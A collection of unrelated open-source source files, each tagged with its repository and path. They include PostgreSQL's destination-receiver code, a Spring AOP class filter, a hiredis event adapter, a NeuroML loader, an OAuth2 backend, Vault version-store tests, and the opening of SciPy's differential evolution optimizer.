* ReadyForQuery - tell dest that we are ready for a new query
*
* NOTES
* These routines do the appropriate work before and after
* tuples are returned by a query to keep the backend and the
* "destination" portals synchronized.
*/
#include "postgres.h"
#include "access/printsimple.h"
#include "access/printtup.h"
#include "access/xact.h"
#include "commands/copy.h"
#include "commands/createas.h"
#include "commands/explain_dr.h"
#include "commands/matview.h"
#include "executor/functions.h"
#include "executor/tqueue.h"
#include "executor/tstoreReceiver.h"
#include "libpq/libpq.h"
#include "libpq/pqformat.h"
/* ----------------
* dummy DestReceiver functions
* ----------------
*/
static bool
donothingReceive(TupleTableSlot *slot, DestReceiver *self)
{
return true;
}
static void
donothingStartup(DestReceiver *self, int operation, TupleDesc typeinfo)
{
}
static void
donothingCleanup(DestReceiver *self)
{
/* this is used for both shutdown and destroy methods */
}
/* ----------------
* static DestReceiver structs for dest types needing no local state
* ----------------
*/
static const DestReceiver donothingDR = {
donothingReceive, donothingStartup, donothingCleanup, donothingCleanup,
DestNone
};
static const DestReceiver debugtupDR = {
debugtup, debugStartup, donothingCleanup, donothingCleanup,
DestDebug
};
static const DestReceiver printsimpleDR = {
printsimple, printsimple_startup, donothingCleanup, donothingCleanup,
DestRemoteSimple
};
static const DestReceiver spi_printtupDR = {
spi_printtup, spi_dest_startup, donothingCleanup, donothingCleanup,
DestSPI
};
/*
* Globally available receiver for DestNone.
*
* It's ok to cast the constness away as any modification of the none receiver
* would be a bug (which gets easier to catch this way).
*/
DestReceiver *None_Receiver = (DestReceiver *) &donothingDR;
/* ----------------
* BeginCommand - initialize the destination at start of command
* ----------------
*/
void
BeginCommand(CommandTag commandTag, CommandDest dest)
{
/* Nothing to do at present */
}
/* ----------------
* CreateDestReceiver - return appropriate receiver function set for dest
* ----------------
*/
DestReceiver *
CreateDestReceiver(CommandDest dest)
{
/*
* It's ok to cast the constness away as any modification of the none
* receiver would be a bug (which gets easier to catch this way).
*/
switch (dest)
{
case DestRemote:
case DestRemoteExecute:
return printtup_create_DR(dest);
case DestRemoteSimple:
return unconstify(DestReceiver *, &printsimpleDR);
case DestNone:
return unconstify(DestReceiver *, &donothingDR);
case DestDebug:
return unconstify(DestReceiver *, &debugtupDR);
case DestSPI:
return unconstify(DestReceiver *, &spi_printtupDR);
case DestTuplestore:
return CreateTuplestoreDestReceiver();
case DestIntoRel:
return CreateIntoRelDestReceiver(NULL);
case DestCopyOut:
return CreateCopyDestReceiver();
case DestSQLFunction:
return CreateSQLFunctionDestReceiver();
case DestTransientRel:
return CreateTransientRelDestReceiver(InvalidOid);
case DestTupleQueue:
return CreateTupleQueueDestReceiver(NULL);
case DestExplainSerialize:
return CreateExplainSerializeDestReceiver(NULL);
}
/* should never get here */
pg_unreachable();
}
/* ----------------
* EndCommand - clean up the destination at end of command
* ----------------
*/
void
EndCommand(const QueryCompletion *qc, CommandDest dest, bool force_undecorated_output)
{
char completionTag[COMPLETION_TAG_BUFSIZE];
Size len;
switch (dest)
{
case DestRemote:
case DestRemoteExecute:
case DestRemoteSimple:
len = BuildQueryCompletionString(completionTag, qc,
force_undecorated_output);
pq_putmessage(PqMsg_CommandComplete, completionTag, len + 1);
case DestNone:
case DestDebug:
case DestSPI:
case DestTuplestore:
case DestIntoRel:
case DestCopyOut:
case DestSQLFunction:
case DestTransientRel:
case DestTupleQueue:
case DestExplainSerialize:
break;
}
}
/* ----------------
* EndReplicationCommand - stripped down version of EndCommand
*
* For use by replication commands.
* ----------------
*/
void
EndReplicationCommand(const char *commandTag)
{
pq_putmessage(PqMsg_CommandComplete, commandTag, strlen(commandTag) + 1);
}
/* ----------------
* NullCommand - tell dest that an empty query string was recognized
*
* This ensures that there will be a recognizable end to the response
* to an Execute message in the extended query protocol.
* ----------------
*/
void
NullCommand(CommandDest dest)
{
switch (dest)
{
case DestRemote:
case DestRemoteExecute:
case DestRemoteSimple:
/* Tell the FE that we saw an empty query string */
pq_putemptymessage(PqMsg_EmptyQueryResponse);
break;
case DestNone:
case DestDebug:
case DestSPI:
case DestTuplestore:
case DestIntoRel:
case DestCopyOut:
case DestSQLFunction:
case DestTransientRel:
case DestTupleQueue:
case DestExplainSerialize:
break;
}
}
/* ----------------
* ReadyForQuery - tell dest that we are ready for a new query
*
* The ReadyForQuery message is sent so that the FE can tell when
* we are done processing a query string.
* In versions 3.0 and up, it also carries a transaction state indicator.
*
* Note that by flushing the stdio buffer here, we can avoid doing it
* most other places and thus reduce the number of separate packets sent.
* ----------------
*/
void
ReadyForQuery(CommandDest dest)
{
switch (dest)
{
case DestRemote:
case DestRemoteExecute:
case DestRemoteSimple:
{
StringInfoData buf;
pq_beginmessage(&buf, PqMsg_ReadyForQuery);
pq_sendbyte(&buf, TransactionBlockStatusCode());
pq_endmessage(&buf);
}
/* Flush output at end of cycle in any case. */
pq_flush();
break;
case DestNone:
case DestDebug:
case DestSPI:
case DestTuplestore:
case DestIntoRel:
case DestCopyOut:
case DestSQLFunction:
case DestTransientRel:
case DestTupleQueue:
case DestExplainSerialize:
break;
}
} | c | github | https://github.com/postgres/postgres | src/backend/tcop/dest.c |
# File generated from our OpenAPI spec by Stainless. See CONTRIBUTING.md for details.
from __future__ import annotations
from typing_extensions import Literal, Required, TypedDict
__all__ = ["ResponseFormatText"]
class ResponseFormatText(TypedDict, total=False):
"""Default response format. Used to generate text responses."""
type: Required[Literal["text"]]
"""The type of response format being defined. Always `text`.""" | python | github | https://github.com/openai/openai-python | src/openai/types/shared_params/response_format_text.py |
/*
* Copyright 2002-present the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.aop.support.annotation;
import java.lang.annotation.Annotation;
import org.jspecify.annotations.Nullable;
import org.springframework.aop.ClassFilter;
import org.springframework.core.annotation.AnnotatedElementUtils;
import org.springframework.util.Assert;
/**
* Simple ClassFilter that looks for a specific annotation being present on a class.
*
* @author Juergen Hoeller
* @since 2.0
* @see AnnotationMatchingPointcut
*/
public class AnnotationClassFilter implements ClassFilter {
private final Class<? extends Annotation> annotationType;
private final boolean checkInherited;
/**
* Create a new AnnotationClassFilter for the given annotation type.
* @param annotationType the annotation type to look for
*/
public AnnotationClassFilter(Class<? extends Annotation> annotationType) {
this(annotationType, false);
}
/**
* Create a new AnnotationClassFilter for the given annotation type.
* @param annotationType the annotation type to look for
* @param checkInherited whether to also check the superclasses and
* interfaces as well as meta-annotations for the annotation type
* (i.e. whether to use {@link AnnotatedElementUtils#hasAnnotation}
* semantics instead of standard Java {@link Class#isAnnotationPresent})
*/
public AnnotationClassFilter(Class<? extends Annotation> annotationType, boolean checkInherited) {
Assert.notNull(annotationType, "Annotation type must not be null");
this.annotationType = annotationType;
this.checkInherited = checkInherited;
}
@Override
public boolean matches(Class<?> clazz) {
return (this.checkInherited ? AnnotatedElementUtils.hasAnnotation(clazz, this.annotationType) :
clazz.isAnnotationPresent(this.annotationType));
}
@Override
public boolean equals(@Nullable Object other) {
return (this == other || (other instanceof AnnotationClassFilter otherCf &&
this.annotationType.equals(otherCf.annotationType) &&
this.checkInherited == otherCf.checkInherited));
}
@Override
public int hashCode() {
return this.annotationType.hashCode();
}
@Override
public String toString() {
return getClass().getName() + ": " + this.annotationType;
}
} | java | github | https://github.com/spring-projects/spring-framework | spring-aop/src/main/java/org/springframework/aop/support/annotation/AnnotationClassFilter.java |
lazy import test.test_import.data.lazy_imports.basic2 as basic2
def f():
x = globals()
return x['basic2'].resolve()
f() | python | github | https://github.com/python/cpython | Lib/test/test_import/data/lazy_imports/lazy_get_value.py |
#ifndef __HIREDIS_IVYKIS_H__
#define __HIREDIS_IVYKIS_H__
#include <iv.h>
#include "../hiredis.h"
#include "../async.h"
typedef struct redisIvykisEvents {
redisAsyncContext *context;
struct iv_fd fd;
} redisIvykisEvents;
static void redisIvykisReadEvent(void *arg) {
redisAsyncContext *context = (redisAsyncContext *)arg;
redisAsyncHandleRead(context);
}
static void redisIvykisWriteEvent(void *arg) {
redisAsyncContext *context = (redisAsyncContext *)arg;
redisAsyncHandleWrite(context);
}
static void redisIvykisAddRead(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_in(&e->fd, redisIvykisReadEvent);
}
static void redisIvykisDelRead(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_in(&e->fd, NULL);
}
static void redisIvykisAddWrite(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_out(&e->fd, redisIvykisWriteEvent);
}
static void redisIvykisDelWrite(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_set_handler_out(&e->fd, NULL);
}
static void redisIvykisCleanup(void *privdata) {
redisIvykisEvents *e = (redisIvykisEvents*)privdata;
iv_fd_unregister(&e->fd);
hi_free(e);
}
static int redisIvykisAttach(redisAsyncContext *ac) {
redisContext *c = &(ac->c);
redisIvykisEvents *e;
/* Nothing should be attached when something is already attached */
if (ac->ev.data != NULL)
return REDIS_ERR;
/* Create container for context and r/w events */
e = (redisIvykisEvents*)hi_malloc(sizeof(*e));
if (e == NULL)
return REDIS_ERR;
e->context = ac;
/* Register functions to start/stop listening for events */
ac->ev.addRead = redisIvykisAddRead;
ac->ev.delRead = redisIvykisDelRead;
ac->ev.addWrite = redisIvykisAddWrite;
ac->ev.delWrite = redisIvykisDelWrite;
ac->ev.cleanup = redisIvykisCleanup;
ac->ev.data = e;
/* Initialize and install read/write events */
IV_FD_INIT(&e->fd);
e->fd.fd = c->fd;
e->fd.handler_in = redisIvykisReadEvent;
e->fd.handler_out = redisIvykisWriteEvent;
e->fd.handler_err = NULL;
e->fd.cookie = e->context;
iv_fd_register(&e->fd);
return REDIS_OK;
}
#endif | c | github | https://github.com/redis/redis | deps/hiredis/adapters/ivykis.h |
## Description: class NeuroML for loading NeuroML from single file into MOOSE
## Version 1.0 by Aditya Gilra, NCBS, Bangalore, India, 2011 for serial MOOSE
## Version 1.5 by Niraj Dudani, NCBS, Bangalore, India, 2012, ported to parallel MOOSE
## Version 1.6 by Aditya Gilra, NCBS, Bangalore, India, 2012, further changes for parallel MOOSE
"""
NeuroML.py is the preferred interface to read NeuroML files.
Instantiate NeuroML class, and thence use method:
readNeuroMLFromFile(...) to load NeuroML from a file:
(a) the file could contain all required levels 1, 2 and 3 - Morph, Channel and Network;
OR
(b) the file could have only L3 (network) with L2 (channels/synapses) and L1 (cells) spread over multiple files;
these multiple files should be in the same or lower-level directory
named as <chan/syn_name>.xml or <cell_name>.xml or <cell_name>.morph.xml
(essentially as generated by neuroConstruct's export).
OR
(c) the file could contain only L2 (MorphML) or only L1 (ChannelML),
in which case the loader reads them into /library or at the path passed in.
OR
(d) your lower level L1 and L2 xml files could be scattered in non-hierarchical directories,
then you can use this reader to load the ChannelML files individually into /library,
then this reader to load MorphML files into /library.
Store the cellDict returned for each cell, and combine them into a larger cellsDict as below,
and finally call this reader on the NetworkML file passing the cellsDict.
[OR you can use the separate Channel, Morph and NetworkML loaders in moose.neuroml.<...>
to load each level files individually i.e. first load ChannelML files into /library,
then cells from MorphML and, finally the NetworkML.]
For testing, you can also call this from the command line with a neuroML file as argument.
However, the new relative import .ChannelML breaks calling it from commandline,
so have to do it on python / ipython terminal:
In [1]: import moose
In [2]: import moose.neuroml
In [3]: moose.neuroml.loadNeuroML_L123('Generated.net.xml')
"""
from __future__ import print_function
import moose
from moose.utils import *
from xml.etree import cElementTree as ET
from moose.neuroml.ChannelML import ChannelML
from moose.neuroml.MorphML import MorphML
from moose.neuroml.NetworkML import NetworkML
from moose.neuroml.utils import *
import sys
from os import path
import logging
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
_logger = logging.getLogger('moose.nml.neuroml')
_logger.addHandler(console)
class NeuroML():
def __init__(self):
pass
def readNeuroMLFromFile(self,filename,params={},cellsDict={}):
"""
For the format of params required to tweak what cells are loaded,
refer to the doc string of NetworkML.readNetworkMLFromFile().
Returns (populationDict,projectionDict),
see doc string of NetworkML.readNetworkML() for details.
"""
_logger.info("Loading neuroml file %s " % filename)
moose.Neutral('/library') # creates /library in MOOSE tree; elif present, wraps
tree = ET.parse(filename)
root_element = tree.getroot()
self.model_dir = path.dirname( path.abspath( filename ) )
if 'lengthUnits' in list(root_element.attrib.keys()):
self.lengthUnits = root_element.attrib['lengthUnits']
else:
self.lengthUnits = 'micrometer'
## lots of gymnastics to check if temperature meta tag is present
self.temperature = CELSIUS_default # gets replaced below if tag for temperature is present
self.temperature_default = True
for meta_property in root_element.findall('.//{'+meta_ns+'}property'):
## tag can be an attrib or an element
if 'tag' in list(meta_property.attrib.keys()): # tag is an attrib
tagname = meta_property.attrib['tag']
if 'temperature' in tagname:
self.temperature = float(meta_property.attrib['value'])
self.temperature_default = False
else: # tag is a separate element
tag = meta_property.find('.//{'+meta_ns+'}tag')
tagname = tag.text
if 'temperature' in tagname:
## value can be a tag or an element
if 'value' in list(tag.attrib.keys()): # value is an attrib
self.temperature = float(tag.attrib['value'])
self.temperature_default = False
else: # value is a separate element
self.temperature = float(tag.find('.//{'+meta_ns+'}value').text)
self.temperature_default = False
if self.temperature_default:
_logger.info("Using default temperature of %s degree Celsius" % self.temperature)
self.nml_params = {
'temperature':self.temperature,
'model_dir':self.model_dir,
}
_logger.debug("Loading channels and synapses into MOOSE /library ...")
cmlR = ChannelML(self.nml_params)
for channels in root_element.findall('.//{'+neuroml_ns+'}channels'):
self.channelUnits = channels.attrib['units']
for channel in channels.findall('.//{'+cml_ns+'}channel_type'):
## ideally I should read in extra params
## from within the channel_type element and put those in also.
## Global params should override local ones.
cmlR.readChannelML(channel,params=params,units=self.channelUnits)
for synapse in channels.findall('.//{'+cml_ns+'}synapse_type'):
cmlR.readSynapseML(synapse,units=self.channelUnits)
for ionConc in channels.findall('.//{'+cml_ns+'}ion_concentration'):
cmlR.readIonConcML(ionConc,units=self.channelUnits)
_logger.debug("Loading cell definitions into MOOSE /library ...")
mmlR = MorphML(self.nml_params)
self.cellsDict = cellsDict
for cells in root_element.findall('.//{'+neuroml_ns+'}cells'):
for cell in cells.findall('.//{'+neuroml_ns+'}cell'):
cellDict = mmlR.readMorphML(cell,params=params,lengthUnits=self.lengthUnits)
self.cellsDict.update(cellDict)
## check if there are populations in this NML files,
## if not, it's a MorphML or ChannelML file, not NetworkML, so skip.
if root_element.find('.//{'+neuroml_ns+'}populations') is None \
and root_element.find('.//{'+nml_ns+'}populations') is None:
return (self.cellsDict,'no populations (L3 NetworkML) found.')
else:
_logger.debug("Loading individual cells into MOOSE root ... ")
nmlR = NetworkML(self.nml_params)
return nmlR.readNetworkML(root_element,self.cellsDict,\
params=params,lengthUnits=self.lengthUnits)
## cellsDict = { cellname: (segDict, cableDict), ... } # multiple cells
## where segDict = { segid1 : [ segname,(proximalx,proximaly,proximalz),
## (distalx,distaly,distalz),diameter,length,[potential_syn1, ... ] ] , ... }
## segname is "<name>_<segid>" because 1) guarantees uniqueness,
## & 2) later scripts obtain segid from the compartment's name!
## and cableDict = { cablegroupname : [campartment1name, compartment2name, ... ], ... }
self.cellsDict = nmlR.cellSegmentDict
def loadNeuroML_L123(filename):
neuromlR = NeuroML()
return neuromlR.readNeuroMLFromFile(filename)
if __name__ == "__main__":
if len(sys.argv)<2:
_logger.error("You need to specify the neuroml filename.")
sys.exit(1)
print(loadNeuroML_L123(sys.argv[1])) | unknown | codeparrot/codeparrot-clean | ||
from urllib import urlencode
import six
from requests_oauthlib import OAuth1
from social.backends.oauth import BaseOAuth2
class NKOAuth2(BaseOAuth2):
"""NK OAuth authentication backend"""
name = 'nk'
AUTHORIZATION_URL = 'https://nk.pl/oauth2/login'
ACCESS_TOKEN_URL = 'https://nk.pl/oauth2/token'
SCOPE_SEPARATOR = ','
ACCESS_TOKEN_METHOD = 'POST'
SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER'
EXTRA_DATA = [
('id', 'id'),
]
def get_user_details(self, response):
"""Return user details from NK account"""
entry = response['entry']
return {
'username': entry.get('displayName'),
'email': entry['emails'][0]['value'],
'first_name': entry.get('displayName').split(' ')[0],
'id': entry.get('id')
}
def auth_complete_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
return {
'grant_type': 'authorization_code', # request auth code
'code': self.data.get('code', ''), # server response code
'client_id': client_id,
'client_secret': client_secret,
'redirect_uri': self.get_redirect_uri(state),
'scope': self.get_scope_argument()
}
def get_user_id(self, details, response):
"""Return a unique ID for the current user, by default from server
response."""
return details.get(self.ID_KEY)
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
url = 'http://opensocial.nk-net.pl/v09/social/rest/people/@me?' + urlencode({
'nk_token': access_token,
'fields': 'name,surname,avatar,localization,age,gender,emails,birthdate'
})
return self.get_json(
url,
auth=self.oauth_auth(access_token)
)
def oauth_auth(self, token=None, oauth_verifier=None,
signature_type=SIGNATURE_TYPE_AUTH_HEADER):
key, secret = self.get_key_and_secret()
oauth_verifier = oauth_verifier or self.data.get('oauth_verifier')
token = token or {}
# decoding='utf-8' produces errors with python-requests on Python3
# since the final URL will be of type bytes
decoding = None if six.PY3 else 'utf-8'
state = self.get_or_create_state()
return OAuth1(key, secret,
resource_owner_key=None,
resource_owner_secret=None,
callback_uri=self.get_redirect_uri(state),
verifier=oauth_verifier,
signature_type=signature_type,
decoding=decoding) | unknown | codeparrot/codeparrot-clean | ||
import math
import numpy
def normalise(a):
'''
Normalises a vector
Accepts: a numpy vector
Returns: a numpy vector pointing in the same direction with magnitude 1
'''
a_norm = numpy.linalg.norm(a)
return numpy.array([float(each)/a_norm for each in a])
def rotation_axis_angle(axis, angle):
'''
Returns the 3x3 matrix for rotation by an angle around an axis
Accepts: an axis as a numpy array, and an angle in radians
Returns: a rotation matrix as a numpy array
'''
sin = math.sin(angle)
cos = math.cos(angle)
comp = 1 - cos
x, y, z = normalise(axis)
mat = numpy.array([[(cos + x*x*comp), (x*y*comp - z*sin), (x*z*comp + y*sin)],
[(y*x*comp + z*sin), (cos + y*y*comp), (y*z*comp - x*sin)],
[(z*x*comp - y*sin), (z*y*comp + x*sin), (cos + z*z*comp)]])
should_be_I = mat.dot(mat.transpose())
I = numpy.ma.identity(3)
numpy.testing.assert_array_almost_equal(I, should_be_I, 3)
return mat
def rotation_from_axes(ax1, ax2): # To test
'''
Calculate the matrix to rotate one vector to another
Accepts: two 3-vectors as numpy arrays
Returns: a rotation matrix as a numpy array
'''
# Probably a more numpy-ish way of doing this
if max(numpy.absolute(ax1 - ax2)) < 1E-7:
return numpy.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
elif max(numpy.absolute(ax1 + ax2)) < 1E-7:
ang = angle_between(ax1, ax2)
z = math.sqrt(1/(1 + (ax1[2]/ax1[1])**2))
y = math.sqrt(1 - z**2)
rot_ax = numpy.array([0, y, z])
return rotation_axis_angle(rot_ax, ang)
else:
ang = angle_between(ax1, ax2)
rot_ax = numpy.cross(ax1, ax2)
return rotation_axis_angle(rot_ax, ang)
def angle_between(vec1, vec2):
'''
Calculate the angle between two vectors
Accepts: two vectors as numpy arrays
Returns: the angle in radians
'''
return math.acos(float(vec1.dot(vec2)) /
(numpy.linalg.norm(vec1) * numpy.linalg.norm(vec2)))
def reflection_plane(vec1, vec2):
'''
Returns the Householder reflection matrix for reflection through
a plane
Accepts: two non-parallel vectors in the plane as numpy arrays
Returns: the 3x3 reflection matrix as a numpy array
'''
norm = numpy.cross(vec1, vec2)
a, b, c = normalise(norm)
return numpy.array([[1 - 2*a*a, -2*a*b, -2*a*c],
[-2*a*b, 1-2*b*b, -2*b*c],
[-2*a*c, -2*b*c, 1-2*c*c]]) | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import TYPE_CHECKING, Protocol, runtime_checkable
if TYPE_CHECKING:
from collections.abc import Iterable
from airflow.serialization.definitions.mappedoperator import Operator
@runtime_checkable
class ReferenceMixin(Protocol):
"""
Mixin for things that references a task.
This should be implemented by things that reference operators and use them
to lazily resolve values at runtime. The most prominent examples are XCom
references (XComArg).
This is a partial interface to the SDK's ResolveMixin with the resolve()
method removed since the scheduler should not need to resolve the reference.
"""
def iter_references(self) -> Iterable[tuple[Operator, str]]:
"""
Find underlying XCom references this contains.
This is used by the DAG parser to recursively find task dependencies.
:meta private:
"""
raise NotImplementedError | python | github | https://github.com/apache/airflow | airflow-core/src/airflow/models/referencemixin.py |
// Copyright IBM Corp. 2016, 2025
// SPDX-License-Identifier: BUSL-1.1
package vault
import (
"context"
"testing"
"time"
"github.com/hashicorp/vault/version"
)
// TestVersionStore_StoreMultipleVaultVersions writes multiple versions of 1.9.0 and verifies that only
// the original timestamp is stored.
func TestVersionStore_StoreMultipleVaultVersions(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
vaultVersion := &VaultVersion{
Version: version.Version,
TimestampInstalled: upgradeTimePlusEpsilon.Add(30 * time.Hour),
}
wasStored, err := c.storeVersionEntry(context.Background(), vaultVersion, false)
if err != nil || wasStored {
t.Fatalf("vault version was re-stored: %v, err is: %s", wasStored, err.Error())
}
versionEntry, ok := c.versionHistory[version.Version]
if !ok {
t.Fatalf("no %s version timestamp found", version.Version)
}
if versionEntry.TimestampInstalled.After(upgradeTimePlusEpsilon) {
t.Fatalf("upgrade time for %s is incorrect: got %+v, expected less than %+v", version.Version, versionEntry.TimestampInstalled, upgradeTimePlusEpsilon)
}
}
// TestVersionStore_GetOldestVersion verifies that FindOldestVersionTimestamp finds the oldest
// (in time) vault version stored.
func TestVersionStore_GetOldestVersion(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
// 1.6.2 is stored before 1.6.1, so even though it is a higher number, it should be returned.
versionEntries := []VaultVersion{
{Version: "1.6.2", TimestampInstalled: upgradeTimePlusEpsilon.Add(-4 * time.Hour)},
{Version: "1.6.1", TimestampInstalled: upgradeTimePlusEpsilon.Add(2 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err := c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 3 {
t.Fatalf("expected 3 entries in timestamps map after refresh, found: %d", len(c.versionHistory))
}
v, tm, err := c.FindOldestVersionTimestamp()
if err != nil {
t.Fatal(err)
}
if v != "1.6.2" {
t.Fatalf("expected 1.6.2, found: %s", v)
}
if tm.Before(upgradeTimePlusEpsilon.Add(-6*time.Hour)) || tm.After(upgradeTimePlusEpsilon.Add(-2*time.Hour)) {
t.Fatalf("incorrect upgrade time logged: %v", tm)
}
}
// TestVersionStore_IsNewInstall consults the version store to see if version
// history is empty. This property should hold during early unseal of a new
// Vault installation.
func TestVersionStore_IsNewInstall(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
now := time.Now().UTC()
// Remove version history to simulate early unseal
vaultVersionPath := "core/versions/"
key := vaultVersionPath + version.Version
if err := c.barrier.Delete(context.Background(), key); err != nil {
t.Fatal(err)
}
// delete the version from the map as well
delete(c.versionHistory, version.Version)
if newInstall := c.IsNewInstall(c.activeContext); !newInstall {
t.Fatal("expected IsNewInstall to return 'true', but got 'false'")
}
firstEntry := &VaultVersion{Version: "1.16.0", TimestampInstalled: now}
if _, err := c.storeVersionEntry(context.Background(), firstEntry, false); err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", firstEntry, err.Error())
}
if err := c.loadVersionHistory(c.activeContext); err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 1 {
t.Fatalf("expected 1 entry in timestamps map after refresh, found: %d", len(c.versionHistory))
}
secondEntry := &VaultVersion{Version: "1.13.0", TimestampInstalled: now}
_, err := c.storeVersionEntry(context.Background(), secondEntry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", secondEntry, err.Error())
}
err = c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 2 {
t.Fatalf("expected 2 entry in timestamps map after refresh, found: %d", len(c.versionHistory))
}
if newInstall := c.IsNewInstall(c.activeContext); newInstall {
t.Fatal("expected IsNewInstall to return 'false', but got 'true'")
}
}
// TestVersionStore_GetNewestVersion verifies that FindNewestVersionTimestamp finds the newest
// (in time) vault version stored.
func TestVersionStore_GetNewestVersion(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
upgradeTimePlusEpsilon := time.Now().UTC()
// 1.6.1 is stored after 1.6.2, so even though it is a lower number, it should be returned.
versionEntries := []VaultVersion{
{Version: "1.6.2", TimestampInstalled: upgradeTimePlusEpsilon.Add(-4 * time.Hour)},
{Version: "1.6.1", TimestampInstalled: upgradeTimePlusEpsilon.Add(2 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err := c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to populate version history cache, err: %s", err.Error())
}
if len(c.versionHistory) != 3 {
t.Fatalf("expected 3 entries in timestamps map after refresh, found: %d", len(c.versionHistory))
}
v, tm, err := c.FindNewestVersionTimestamp()
if err != nil {
t.Fatal(err)
}
if v != "1.6.1" {
t.Fatalf("expected 1.6.1, found: %s", v)
}
if tm.Before(upgradeTimePlusEpsilon.Add(1*time.Hour)) || tm.After(upgradeTimePlusEpsilon.Add(3*time.Hour)) {
t.Fatalf("incorrect upgrade time logged: %v", tm)
}
}
func TestVersionStore_SelfHealUTC(t *testing.T) {
c, _, _ := TestCoreUnsealed(t)
estLoc, err := time.LoadLocation("EST")
if err != nil {
t.Fatalf("failed to load location, err: %s", err.Error())
}
nowEST := time.Now().In(estLoc)
versionEntries := []VaultVersion{
{Version: "1.9.0", TimestampInstalled: nowEST.Add(24 * time.Hour)},
{Version: "1.9.1", TimestampInstalled: nowEST.Add(48 * time.Hour)},
}
for _, entry := range versionEntries {
_, err := c.storeVersionEntry(context.Background(), &entry, false)
if err != nil {
t.Fatalf("failed to write version entry %#v, err: %s", entry, err.Error())
}
}
err = c.loadVersionHistory(c.activeContext)
if err != nil {
t.Fatalf("failed to load version timestamps, err: %s", err.Error())
}
for _, entry := range c.versionHistory {
if entry.TimestampInstalled.Location() != time.UTC {
t.Fatalf("failed to convert %s timestamp %s to UTC", entry.Version, entry.TimestampInstalled)
}
}
} | go | github | https://github.com/hashicorp/vault | vault/version_store_test.go |
"""
differential_evolution: The differential evolution global optimization algorithm
Added by Andrew Nelson 2014
"""
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.optimize import OptimizeResult, minimize
from scipy.optimize.optimize import _status_message
import numbers
__all__ = ['differential_evolution']
_MACHEPS = np.finfo(np.float64).eps
def differential_evolution(func, bounds, args=(), strategy='best1bin',
maxiter=1000, popsize=15, tol=0.01,
mutation=(0.5, 1), recombination=0.7, seed=None,
callback=None, disp=False, polish=True,
init='latinhypercube'):
"""Finds the global minimum of a multivariate function.
Differential Evolution is stochastic in nature (does not use gradient
methods) to find the minimium, and can search large areas of candidate
space, but often requires larger numbers of function evaluations than
conventional gradient based techniques.
The algorithm is due to Storn and Price [1]_.
Parameters
----------
func : callable
The objective function to be minimized. Must be in the form
``f(x, *args)``, where ``x`` is the argument in the form of a 1-D array
and ``args`` is a tuple of any additional fixed parameters needed to
completely specify the function.
bounds : sequence
Bounds for variables. ``(min, max)`` pairs for each element in ``x``,
defining the lower and upper bounds for the optimizing argument of
`func`. It is required to have ``len(bounds) == len(x)``.
``len(bounds)`` is used to determine the number of parameters in ``x``.
args : tuple, optional
Any additional fixed parameters needed to
completely specify the objective function.
strategy : str, optional
The differential evolution strategy to use. Should be one of:
- 'best1bin'
- 'best1exp'
- 'rand1exp'
- 'randtobest1exp'
- 'best2exp'
- 'rand2exp'
- 'randtobest1bin'
- 'best2bin'
- 'rand2bin'
- 'rand1bin'
The default is 'best1bin'.
maxiter : int, optional
The maximum number of generations over which the entire population is
evolved. The maximum number of function evaluations (with no polishing)
is: ``(maxiter + 1) * popsize * len(x)``
popsize : int, optional
A multiplier for setting the total population size. The population has
``popsize * len(x)`` individuals.
tol : float, optional
When the mean of the population energies, multiplied by tol,
divided by the standard deviation of the population energies
is greater than 1 the solving process terminates:
``convergence = mean(pop) * tol / stdev(pop) > 1``
mutation : float or tuple(float, float), optional
The mutation constant. In the literature this is also known as
differential weight, being denoted by F.
If specified as a float it should be in the range [0, 2].
If specified as a tuple ``(min, max)`` dithering is employed. Dithering
randomly changes the mutation constant on a generation by generation
